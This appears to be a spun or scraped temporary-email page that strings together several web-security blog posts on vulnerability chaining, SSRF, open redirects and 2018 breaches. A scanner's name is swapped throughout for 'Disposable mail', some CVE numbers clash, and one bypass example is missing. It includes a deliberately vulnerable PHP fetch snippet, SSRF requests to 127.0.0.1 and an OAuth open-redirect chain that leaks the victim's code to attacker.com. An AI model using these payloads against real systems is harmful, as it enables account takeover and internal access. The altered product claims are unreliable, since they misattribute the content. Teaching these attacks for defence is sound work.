Do not dismiss the small vulnerabilities! – 10 minute mail

Never dismiss a small vulnerability because its impact on its own is negligible. Seemingly innocent vulnerabilities can be combined into something much more dangerous or, at the very least, be used to aid in an attack.

Sometimes a small vulnerability is overlooked because its impact on its own is not seen as dangerous. What is often missed in this type of scenario is what happens when vulnerabilities are combined. This is often called vulnerability chaining.

Combining vulnerabilities

It is way too common to disregard vulnerabilities because they have no big security impact by themselves.

This is not a technical blog post with awesome well thought-out examples of combined vulnerabilities. This is food for thought, to introduce the mindset and make you think a few steps ahead. This is how the examples should be read.

How vulnerabilities can be combined

Example 1

Imagine there is a developer page publicly accessible from the internet. The only thing this page does is print the whole request onto the page. At first glance this looks very innocent: how much does seeing their own request really help the attacker?

Now, imagine there is also an XSS on the same domain. All of a sudden the printed request becomes very bad, as the hacker is able to steal all cookies with the XSS. Script injected through an XSS can read the content of any page on the domain, but it cannot read cookies flagged HttpOnly, since those are only sent in the request headers. Because the debug page echoes the whole request, Cookie header included, the XSS can fetch that page and read the cookies from it. Such a debug page will therefore result in an HttpOnly bypass.

Example 2

Sometimes developers deprioritize upgrading software that is only accessible locally. Vulnerable software that only allows requests from localhost/the same server does not sound that scary.

There is another vulnerability type called SSRF, Server Side Request Forgery. In short, it means that an attacker is able to force the web server to make custom requests to the internal network.

Now combine these two and an attacker is able to exploit the vulnerable software that was only running locally. Neither of those things sounds that dangerous, but combined, they can have a considerable impact!

Example 3

Login/logout CSRF is another vulnerability we have written about before. It enables the attacker to forcibly log the victim in to the attacker’s own account.

Once again, at first glance this looks innocent enough. What good does it do the attacker that they can give away their own account? However, combine it with an XSS that previously only affected your own account and you now have an XSS affecting anyone.

Example 4

A great write-up on the subject is the one written by Orange Tsai, combining four different vulnerabilities resulting in the ability to execute code on GitHub’s servers.

Automation

Many of these combinations are hard to automate. Some can of course be combined automatically, but others still require human creativity to fully understand the potential impact.

Because of this, minor issues reported by tools such as Disposable mail should not be ignored. Critical findings need to be prioritised, but it is a good idea to try and think about how an attacker might exploit minor issues. Maybe even the most harmless ones can escalate into something critical?

To check your site for both minor and critical security issues, sign up for a free Disposable mail trial and run a scan. You will receive a detailed report with all the identified vulnerabilities and tips on how to fix them.

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

9 biggest web security news of 2018 – 10 minute mail

The year started off with a bang as the research on Meltdown and Spectre rendered almost all computing devices vulnerable. As the year moved on, Facebook, Magecart and 2FA alternatives were also part of security discussions. Here are our top 9 picks for the biggest web security news of 2018:


1. Meltdown and Spectre

Meltdown and Spectre are collectively three critical vulnerabilities that had anyone with a computer made since 1995 on their feet. Meltdown (CVE-2017-5754) is a hardware vulnerability found to attack general memory data security, and the name was given due to the ability of the attack to “melt” security boundaries. Spectre (CVE-2017-5753 and CVE-2017-5715) is reported to affect every single computer device, as it’s been verified that they affect Intel, AMD, and ARM processors. Their exploitation allows hackers to access passwords stored in a password manager or browser, personal photos, emails, private messages and even business-critical documents.

2. Facebook – “View As” feature

Facebook has been in the public eye on several big occasions this year, including the Cambridge Analytica scandal and Mark Zuckerberg’s testimony in front of the US Congress about data privacy. The year wouldn’t be complete without a hacker attack. In late September, 50 million people were automatically logged out of their Facebook accounts due to a hacker attack via the “View As” feature. The hackers began by exploiting the video uploading feature and eventually chained this together with a weakness in the “View As” feature. During this process a user token was generated for the user being “viewed as”, which was not intended to happen, and this token appeared in the HTML code. From there the hackers gained access to the user account and automated their attack, which eventually resulted in an activity spike that caught Facebook’s attention so it could take action in time. In total, there were 3 bugs that the malicious actors were able to chain together to gain access to user tokens. When Facebook became aware of this, it forced a logout to reset tokens for 50 million users and an additional 40 million who were potentially affected. Whilst Facebook’s logging and monitoring practices were able to act fast and alert users well, the company seems unwilling to take more security risks, as there are plans to add a cybersecurity company to their group.

3. Marriott – 500 million users had data stolen. Hackers had access since 2014

Going down as one of the largest data breaches to happen so far, 500 million Starwood guests had personal details such as names, addresses, passport information and emails compromised by malicious hackers. Reports state hackers were in the system back in 2014, before Marriott acquired the Starwood Hotel brand in 2016, and this has angered many security experts and people in general, knowing that SPG was aware of the issue and it failed to be addressed during the acquisition. The personal information taken was encrypted; however, given four years’ time, one could be certain that the hackers were able to decrypt the details. It’s not certain whether Marriott was aware of this or not, but we can expect cybersecurity to be taken more seriously in future business acquisitions.

4. Another year of leaky S3 buckets, which led to AWS finally changing the privacy settings for bucket configurations

As in 2017, this year saw several high-profile companies, including FedEx and GoDaddy, fall victim to customer data leaks through cloud storage misconfigurations, especially of S3 buckets. These are usually the fault of the company that misconfigured its AWS S3 bucket, but we even saw a case where an AWS employee made the S3 bucket misconfiguration mistake on behalf of GoDaddy. The consequence: public exposure of highly sensitive information including GoDaddy’s hosting infrastructure, operating system, workload and more, which gave away a lot of competitive intelligence. This finally prompted AWS to make changes to the bucket settings and make it easier for users to block public access to buckets.

5. Implementation of GDPR and Google and Facebook slapped with fines

2018 also was the year for GDPR to come into play and this has all sorts of professionals scrambling to make sure their practices are compliant, lawyers were banking in on new business, some opportunists upgraded their careers to becoming a DPO and end users were bombarded with emails regarding GDPR, all before May 25th. There was no grace period to GDPR enforcement as Google and Facebook were given fines immediately. Not only did GDPR get ordinary people to start thinking a bit more on the privacy of their personal details, but it has challenged companies to work more proactively with security.

6. Magecart and third-party javascript

Magecart, an online criminal hacker group, has been using cross-site scripting (XSS) tactics to inject malicious code into different online credit card forms. By doing so they’ve been able to steal sensitive information including, yes of course, credit card details and personal names. This method is used widely and the companies compromised by this attack are many, including British Airways and Inbenta, a third-party JavaScript provider used by Ticketmaster. This serves as a good reminder to always check web applications for XSS, and especially third-party software, as Magecart does not show signs of stopping.

7. SMS 2FA not secure

Reddit was hacked in June and their employee accounts were compromised despite having 2FA via SMS enabled. As their report explains, the attacker was able to intercept SMS messages containing the access code and use this to log into the employee accounts. This prompted a great discussion on what kind of 2FA is needed. Reddit themselves suggest using a token-based 2FA as well as ensuring passwords are complicated. You can find these tips and more in our tips for secure remote work.

8. Drupalgeddon

There was a remote code execution vulnerability found in Drupal, and this critical vulnerability was aptly named Drupalgeddon v2.0. It affects versions between 6 and 8, and if exploited the bad actor would have access to all non-public data and also the ability to modify or delete items. According to official notes, updating Drupal alone will not remove backdoors or fix compromised sites. Therefore anyone affected would have to update right away but also run their own security checks to remediate the issue.

9. Stop playing security whack-a-mole

Parisa Tabriz, Director of Engineering at Google, opened up this year’s Black Hat USA calling on everyone to implement long-term defensive security. Rather than playing what she called security whack-a-mole and tackling security issues as they come up, there needs to be more strategic and proactive action to ensure security in a company. She cited the Google Project Zero as one way they’ve used offensive security examples to improve defensive security tactics, leading to more transparency and collaboration to make end users safer. Companies should build ongoing security processes and invest in training, build up security champions and develop a security culture in the organization. Some argue it needs to be thought of earlier in the development cycle, given more support for the adoption of DevSecOps.

What can we expect next year? We asked our security researcher and technical content writer, Linus Särud:

In 2019, we can expect more cloud-related issues on the rise as well as misconfigurations with third-party providers. They may not necessarily be from S3 bucket leaks due to the changes, but could be of similar nature.

Serverless, microservices and APIs are the “new thing” and we can expect an acceleration in migration over to these services. As a consequence we anticipate more SSRF attacks. When companies go serverless and the traditional RCE is no longer possible, SSRF takes its place. It can be used to request internal servers and steal tokens or credentials used for cloud configurations. In early 2018, Google was vulnerable to this. Here is another write-up on how SSRF can be a problem when running on Amazon, causing the cloud to rain credentials.

Lastly, we expect more subdomain takeovers to occur, and while this has been hyped for long there will be a lot left to be discovered in this area. On the positive side, we anticipate more awareness of cloud security risks and the continued rise of DevSecOps, where security is considered earlier in the development cycle and companies apply proactive defence instead of reactive measures, enabled by more automation and testing. There will be more open discussions about personal data management because of the GDPR, the NIS directive and other security regulations. People will start to think differently about the security of personal information, in a more protective way, which is a good thing!

Here’s to an even more secure 2019! Is your team equipped with all the tools to make 2019 a secure year for your teams? You can automate some of your security checks using Disposable mail. Ready to give us a try? Sign up for a free trial.



What is server side request forgery (SSRF)? – 10 minute mail

Server Side Request Forgery (SSRF) is a type of attack that can be carried out to compromise a server. Exploiting an SSRF vulnerability enables attackers to make the web application send requests of their choosing, often targeting internal systems behind a firewall. Sometimes a server needs to make a URL request based on user input. A clear example would be an import function, where you can import images from a URL, perhaps when setting a profile picture. When you as a user enter a URL, the server will make a request to that URL and fetch the image.

Server-side request forgery

Interesting things happen when this function can be used to make requests to internal services, for example local IP addresses (RFC 1918) which are not publicly accessible from the internet. If the URL given by the user is not an image, the error page will often show the response of the requested URL. That makes it easier to exploit, but it is not a requirement: without the response being shown you can no longer read information from internal systems, but you can still make internal API calls. Imagine the following PHP code:

<?php
// getimage.php: deliberately vulnerable example, the user-supplied URL is fetched without any validation
$content = file_get_contents($_GET['url']);
file_put_contents('image.jpg', $content);

The above code will fetch data from a URL using PHP’s file_get_contents() function and then save it to disk. A legitimate request would then look like:

GET  /getimage.php?url=https://website.com/images/cat.jpg

And the web application would make a request to https://website.com/images/cat.jpg. This code could be exploited with SSRF. Such an attack could look something like:

GET  /getimage.php?url=http://127.0.0.1/api/v1/getuser/id/1

In this case the vulnerable web application would make a GET request to the internal REST API service, trying to access the /api/v1/getuser/id/1 endpoint. This REST API service is only accessible on the local network, but due to an SSRF vulnerability it was possible for the attacker to make such an internal request and read the response.

Sometimes you can make a request to an external server, and the request itself may contain sensitive headers. One of many examples would be HTTP basic authentication passwords, if a proxy has been used. SSRF can therefore be carried out against both internal and external services. The vulnerability often occurs when you are supposed to be able to make requests to a certain domain only, but are able to bypass the parser/filter. A security researcher known as Orange Tsai spoke about this previously at Black Hat 2017.

Not to be forgotten, sometimes it is possible to use schemes and protocols other than HTTP in an SSRF attack. Examples of these are file://, phar://, gopher://, data:// and dict://.

Traditional setup

It is common to have proper firewall/routing rules for external applications, but normally nothing inside the network. That means that if an attacker is able to make a device already on the network send the requests, there are no security restrictions to care about for internal systems.

Cloud services

Due to microservices and serverless platforms, SSRF will probably be a bigger thing in the future. Making internal requests now means that you can interact with other parts of the service, pretending to be the actual service. Get familiar with cloud security basics including SSRF, as we are already seeing examples of how an SSRF vulnerability more or less leads to RCE in companies running on modern technologies. Examples:

$36k Google App Engine RCE
SSRF reports on HackerOne

If you are using a service such as AWS or Google Cloud, it is often possible to request sensitive tokens/credentials through some API. Metadata in AWS, Google Cloud, and others: https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b

There is no universal protection against SSRF attacks, however there are a few things to have in mind:

  • A blacklist is not a good protection because with so many different protocols, schemes, encodings and super complex URI syntax, bypasses will most certainly occur. Because of this, a whitelist is a better approach.
  • When developing REST APIs, it is better to accept HTTP verbs other than POST and GET, which will make it harder for an SSRF vulnerability to make correct requests to the API service. If an SSRF vulnerability is only able to make internal GET requests, it won’t be able to speak with the API. It is also important to validate both the request to and the response from internal services.
  • Services such as Kibana, Redis, Elasticsearch, MongoDB and Memcached do not require authentication by default, and adding it to those services may make it harder to exploit an SSRF vulnerability.
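The allowlist approach from the list above, and the re-validation of every redirect hop that the open-redirect-to-SSRF chain requires, as an added example in Python (not the post’s own code). It assumes a hypothetical allowlist of image hosts and replaces DNS and HTTP with constructed tables so it runs offline; in real code the resolver would be socket.getaddrinfo and the fetch a real HTTP client that does not follow redirects on its own.

```python
import ipaddress
from urllib.parse import urlparse, urljoin

ALLOWED_SCHEMES = {"http", "https"}                 # no file://, gopher://, dict:// ...
ALLOWED_HOSTS = {"website.com", "cdn.website.com"}  # assumed allowlist of image hosts
MAX_REDIRECTS = 3

# Constructed DNS answers standing in for a real resolver, so the example runs offline.
# cdn.website.com is allowlisted but (mis)configured to point at an internal address.
FAKE_DNS = {
    "website.com": ["93.184.216.34"],
    "cdn.website.com": ["10.0.0.5"],
}

# Constructed HTTP responses: url -> (status, headers, body).
FAKE_HTTP = {
    "https://website.com/images/cat.jpg":
        (200, {"Content-Type": "image/jpeg"}, b"\xff\xd8\xff\xe0"),
    # An open redirect on the allowlisted host pointing at the internal REST API from the post.
    "https://website.com/red.php?url=http://127.0.0.1/api/v1/getuser/id/1":
        (302, {"Location": "http://127.0.0.1/api/v1/getuser/id/1"}, b""),
    "http://127.0.0.1/api/v1/getuser/id/1":
        (200, {"Content-Type": "application/json"}, b'{"id": 1}'),
}


def resolve(host):
    """Hypothetical resolver; replace with socket.getaddrinfo in real code."""
    return FAKE_DNS.get(host.lower(), [])


def is_public_address(addr):
    """True only for globally routable unicast addresses. This rejects RFC 1918,
    loopback, link-local (including the 169.254.169.254 metadata address) and the
    other special-purpose ranges in a single check."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not ip.is_multicast


def check_url(url):
    """Allowlist check for one URL. Returns (ok, reason)."""
    try:
        p = urlparse(url)
        port = p.port                   # raises ValueError on a malformed port
    except ValueError:
        return False, "unparseable URL"
    if p.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if p.username or p.password:
        return False, "credentials in URL not allowed"
    host = p.hostname                   # already lower-cased by urlparse
    if host is None or host not in ALLOWED_HOSTS:
        return False, "host not in allowlist"
    if port not in (None, 80, 443):
        return False, "port not allowed"
    addrs = resolve(host)
    if not addrs:
        return False, "host does not resolve"
    for a in addrs:  # the name may be allowlisted while the address it points to is not
        if not is_public_address(a):
            return False, "host resolves to a non-public address"
    return True, "ok"


def fetch_image(url, get=lambda u: FAKE_HTTP.get(u, (404, {}, b""))):
    """Fetch an image, re-validating every redirect hop. Returns (ok, body_or_reason).
    The reasons are fixed strings, so the caller never echoes an upstream response
    into its own error page."""
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = check_url(url)
        if not ok:
            return False, reason
        status, headers, body = get(url)
        if status in (301, 302, 303, 307, 308):
            url = urljoin(url, headers.get("Location", ""))  # next hop goes through check_url
            continue
        if status != 200:
            return False, "unexpected upstream status"
        if not headers.get("Content-Type", "").startswith("image/"):
            return False, "upstream response is not an image"
        return True, body
    return False, "too many redirects"
```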

The most common way for Disposable mail to detect this kind of vulnerability is by using out-of-band exploitation. For each test we generate a unique string, which we then try to send a request to as part of a domain name. For a specific test we might generate foobar. We then make a request to the server including foobar.poem.detectify.com. If the nameserver for that subdomain then gets a lookup request for foobar, we know that the server has tried to send a request to it, even if we were unable to read the response. For specific tests we may have other solutions in place.
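The out-of-band correlation described above, as an added Python example (not Disposable mail’s own code): one unguessable canary hostname per test, and the nameserver’s query log matched back to the test that planted it. It assumes a placeholder zone canary.example that you control and a constructed BIND-style query log format.

```python
import re
import secrets

CANARY_ZONE = "canary.example"  # assumed placeholder for a DNS zone whose nameserver you control


class OobCanaries:
    """Issue a unique canary hostname per test and correlate nameserver query logs back to tests."""

    # Matches the query part of a BIND-style query log line (constructed format used in the usage).
    _QUERY = re.compile(r"client (?P<client>[0-9a-fA-F.:]+)#\d+: query: (?P<name>[A-Za-z0-9.-]+) IN ")

    def __init__(self, zone=CANARY_ZONE):
        self.zone = zone.lower()
        self.tokens = {}  # token -> test name

    def new_canary(self, test_name):
        """Return the hostname to embed in the test payload for `test_name`."""
        token = secrets.token_hex(6)  # unguessable, so a lookup cannot be a coincidence
        self.tokens[token] = test_name
        return f"{token}.{self.zone}"

    def match_log(self, lines):
        """Return {test_name: [client addresses]} for every registered token seen in `lines`.
        A hit proves the target made the request even when its response was never visible."""
        hits = {}
        suffix = "." + self.zone
        for line in lines:
            m = self._QUERY.search(line)
            if not m:
                continue
            name = m.group("name").lower().rstrip(".")
            if not name.endswith(suffix):
                continue
            # The token is the label directly left of the zone; labels further left are ignored,
            # so a lookup for www.<token>.canary.example still counts as a hit.
            token = name[: -len(suffix)].split(".")[-1]
            test = self.tokens.get(token)
            if test is not None:
                hits.setdefault(test, []).append(m.group("client"))
        return hits
```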

Start your Disposable mail free trial today.

Additional reading:

SSRF definition on OWASP.org

MITRE: CWE-918: Server-Side Request Forgery (SSRF)


Written by: Kristian Bremberg, Linus Särud

Disposable mail is an automated web application scanner checking for 1000+ known vulnerabilities including the OWASP Top 10 and SSRF. Start your Disposable mail free trial today to see whether your applications are vulnerable to SSRF and more.


Disposable mail security updates for 23 January – 10 minute mail

For continuous coverage, we push out major Disposable mail security updates every two weeks, keeping our tool up to date with new findings, features and improvements sourced from our security researchers and Crowdsource ethical hacker community. Due to confidentiality agreements, we cannot publicize all security update releases here, but they are immediately added to our scanner and available to all users. This post highlights a few things that we have improved in the last two weeks.

CVE-2019-2413: Oracle Reports Reflected XSS
One of the endpoints in Oracle Reports reflects the requested URL, which leads to an XSS vulnerability.

CVE-2018-5006: Adobe AEM SSRF via ReportingServicesProxyServlet
CVE-2018-12809 is an SSRF vulnerability in Adobe AEM. It is possible to see the content of the response, and thus e.g. query metadata if it runs within AWS. Read more about SSRF here.

CVE-2017-12637: SAP NetWeaver Directory Traversal
It is possible to read the content of locally hosted files. More information about the vulnerability type can be found here.

Adobe AEM CQ Content-Finder XSS
It is possible to get a response that is supposed to be JSON to instead be sent as HTML, which then leads to an XSS vulnerability.

Oracle Reports Diagnostic Endpoint Exposure
Oracle Reports has an endpoint used for diagnostic information. This gives the attacker information about a system that is supposed to be kept internal.

WGET HSTS List Exposure
When running the wget command, a file is created containing the HSTS information from the downloaded links. This file is sometimes accidentally made publicly available.

Exposure of /.lesshst
.lesshst is a file containing history from the command less. Similar to the issue above, this file is sometimes made publicly available.

WordPress newsletter Open Redirect
An open redirect vulnerability in a popular WordPress plugin that is used for newsletter subscription management.

WordPress wordfence Configuration Disclosure
A configuration file for Wordfence is sometimes made publicly available, which would disclose that Wordfence is used. This is not very sensitive, but gives an attacker more information about a system.

Questions or comments on our latest security updates? Let us know in the section below.

Begin a scan for the latest vulnerabilities today. Start a free trial with Disposable mail here!


Disposable mail is a continuous web scanner monitor service that can be set up for automated scanning for 1000+ known vulnerabilities including the OWASP Top 10. Check for the latest vulnerabilities!


The real impact of an Open Redirect vulnerability – 10 minute mail

The simplest explanation is that the page takes a value and then creates a redirect to it. If /red.php?url=https://example.com created a redirect to https://example.com, that would be a typical Open Redirect vulnerability.

This is called Unvalidated Redirects and Forwards by OWASP and could of course occur for less obvious reasons as well. Maybe you are only supposed to be able to redirect to a specific domain, but is there a bypass of the filter? Maybe the value is not coming from a URL parameter at all, but from something totally different.

We have described this vulnerability type before, while this article will go into how an Open Redirect vulnerability can be exploited.

Header based

Header-based means a Location header sent from the server. The benefit of this, from an attacker’s perspective, is that the redirect always works even if JavaScript is not interpreted. A server-side function that gets a URL as input will follow the redirect and end up somewhere else.

Javascript based

When the redirect instead happens in JavaScript, it only works in scenarios where JavaScript is actually executed. It might not work for server-side functions, but it will work in the victim’s web browser.

If the redirect happens in JavaScript, it might also be possible to cause a redirect to javascript:something(), which would be an XSS in itself.

When explaining the impact of an open redirect, it is common to default to phishing or similar attacks. Whether using an open redirect for phishing actually is a problem or not is debatable. If you receive a link which then redirects you to a sketchy site, how much more trustworthy is that compared to receiving a link to the sketchy site directly?

While some companies do consider this a legitimate risk, others do not.

Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place.

Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored redirectors offers fairly clear benefits and poses very little practical risk.

https://sites.google.com/site/bughunteruniversity/nonvuln/open-redirect

However, phishing is not really all an open redirect can be good for. Open Redirect is often quickly dismissed because phishing is the first thing you come to think about, without considering what it could actually be combined with.

Instead, an open redirect often allows other vulnerabilities to be exploited, or chained to increase the impact. A list of a few of the things an open redirect vulnerability can be used for follows below. It is far from a comprehensive list, but could act as an example of what is possible:

OAuth

When you want to allow users to sign up with external services, such as putting up a “Login with Facebook” or “Sign up with Google” button, you may choose to implement an OAuth flow.

The basic principle is a link going to facebook.com/oauth.php?clientid=123&state=abc&redirect_uri=https://yourdomain.com/oauth. When the user clicks this link they go to Facebook, where they log in and accept the permissions your app requires, and are then redirected back to https://yourdomain.com/oauth?code=xyz.

Now your application can take the value of code and use it to get partial access to the user’s Facebook account, according to the permissions it was given on the login screen. An attacker who obtains the value of the code parameter can likewise use it to log in to the application with the victim’s Facebook account.

If an attacker changed the redirect_uri to https://attacker.com/oauth, the request would be denied directly, as it is an external domain. However, if the attacker finds an open redirect on the accepted domain, it might be possible to combine those:

facebook.com/oauth.php?clientid=123&state=abc&redirect_uri=https://yourdomain.com/red.php?url%3dhttps://attacker.com/

which causes a redirect to

https://yourdomain.com/red.php?url=https://attacker.com/?code=xyz

which in turn causes a redirect to

https://attacker.com/?code=xyz

and now the attacker is able to access the Facebook account on the application’s behalf.

(If it is not possible to keep the code parameter in the URL when redirecting, it might still be leaked in the Referer header of the last request.)

Facebook prevents this attack by requiring the redirect_uri to match a pre-configured URL. However, many other services do not, where this is still a potential issue.

Sometimes this gets a bit complicated. GitHub’s OAuth flow, for example, accepts any subdomain of the registered URL, so if x.com/auth is accepted, so is y.x.com/auth, even though this behaviour is not mentioned anywhere in the documentation. This means that an open redirect on any of your subdomains could lead to an account takeover.

SSRF

We have written about SSRF here before: https://blog.detectify.com/2019/01/10/what-is-server-side-request-forgery-ssrf/

An open redirect is often used to bypass the filters used here. Imagine that you have a service that is allowed to fetch content from a specific domain, but that domain can redirect anywhere. Then an attacker can enter through the allowed server and from there go anywhere.

XSS-Auditor bypass

Google Chrome has a built-in XSS Auditor which sometimes prevents an XSS attack from working. However, it does not prevent the inclusion of scripts hosted on the same domain, so together with an open redirect you can bypass the XSS Auditor like this:

There are some limitations though, such as that the URL cannot contain an equal sign.

Referrer check bypass

One way of protecting against CSRF is to check the referrer header to confirm that the request originated from the website itself.

However, with an open redirect it might be possible to trick this check by running the CSRF attack against the open redirect, which in turn redirects to the correct page. It will look like the CSRF request originated from the open redirect page, which is hosted on the same domain and is allowed to make such requests.


So in conclusion, when you report or create a finding for an open redirect, it is generally not for the impact of the open redirect in itself, but rather for what it can be combined with. Thus, fixing an open redirect prevents the vulnerability from being exploited at an earlier stage.
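What fixing the redirect at the earlier stage looks like in code, as an added Python example (not from the original post): a validator for the red.php?url= style parameter that only ever produces same-site destinations, beside the exact-match redirect_uri check from the OAuth section contrasted with the loose host/subdomain check that the chain above gets past. yourdomain.com, the registered redirect URI and the hypothetical function names are assumptions.

```python
from urllib.parse import urlparse, urlunparse

OUR_ORIGIN = "https://yourdomain.com"                        # assumed site origin
REGISTERED_REDIRECT_URIS = {"https://yourdomain.com/oauth"}  # assumed OAuth client registration


def safe_local_redirect(target):
    """Return the absolute same-site URL to redirect to, or None if `target` must be refused.
    Only a path on our own origin is accepted, so the parameter can never leave the site."""
    if not target:
        return None
    # Browsers treat '\' like '/' in URLs, so '/\other-host' would act as '//other-host'.
    t = target.replace("\\", "/")
    # Whitespace and control characters can hide a scheme from naive prefix checks.
    if any(c.isspace() or ord(c) < 0x20 for c in t):
        return None
    p = urlparse(t)
    if p.scheme or p.netloc:   # 'javascript:...', 'https://...', '//other-host/...' all land here
        return None
    if not p.path.startswith("/") or p.path.startswith("//"):
        return None
    return OUR_ORIGIN + urlunparse(("", "", p.path, p.params, p.query, p.fragment))


def redirect_uri_allowed(redirect_uri):
    """Exact match against the registered URIs, the check the post says Facebook performs.
    An open redirect on the allowed host, or a subdomain of it, simply does not match."""
    return redirect_uri in REGISTERED_REDIRECT_URIS


def loose_redirect_uri_allowed(redirect_uri):
    """The weak check: any https URI on the registered host or one of its subdomains.
    Kept only to show what the open redirect chain in the post gets past."""
    p = urlparse(redirect_uri)
    host = p.hostname or ""
    return p.scheme == "https" and (host == "yourdomain.com" or host.endswith(".yourdomain.com"))
```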

How Disposable mail can help

Disposable mail has an ability to test web applications for open redirect vulnerabilities and 1000+ known web vulnerabilities including the OWASP Top 10 and more. Check your web applications using Disposable mail by starting your 14-day free trial today.
